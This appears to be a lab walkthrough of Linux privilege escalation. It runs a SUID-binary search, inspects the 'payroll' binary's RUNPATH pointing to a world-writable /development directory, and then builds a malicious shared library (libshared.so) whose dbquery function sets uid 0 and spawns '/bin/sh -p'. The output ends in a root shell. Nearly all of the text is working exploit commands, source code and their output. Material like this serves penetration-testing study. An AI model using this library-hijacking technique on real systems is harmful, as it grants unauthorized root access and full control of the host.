find / -type f -perm -u=s 2>/dev/null | xargs ls -l
$ ls -la payroll
-rwsr-xr-x 1 root root 16728 Sep 1 22:05 payroll
Print the shared object required by a binary or shared object
$ ldd payroll
linux-vdso.so.1 => (0x00007ffcb3133000)
libshared.so => /lib/x86_64-linux-gnu/libshared.so (0x00007f7f62e51000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)
$ readelf -d payroll | grep PATH
0x000000000000001d (RUNPATH) Library runpath: [/development]
ls -la /development/
total 8
drwxrwxrwx 2 root root 4096 Sep 1 22:06 ./
drwxr-xr-x 23 root root 4096 Sep 1 21:26 ../
cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
$ ldd payroll
linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)
$ ./payroll
./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
#include<stdio.h>
#include<stdlib.h>
void dbquery() {
printf("Malicious library loaded\n");
setuid(0);
system("/bin/sh -p");
}
gcc src.c -fPIC -shared -o /development/libshared.so
$ ./payroll
***************Inlane Freight Employee Database***************
Malicious library loaded
# id
uid=0(root) gid=1000(mrb3n) groups=1000(mrb3n)
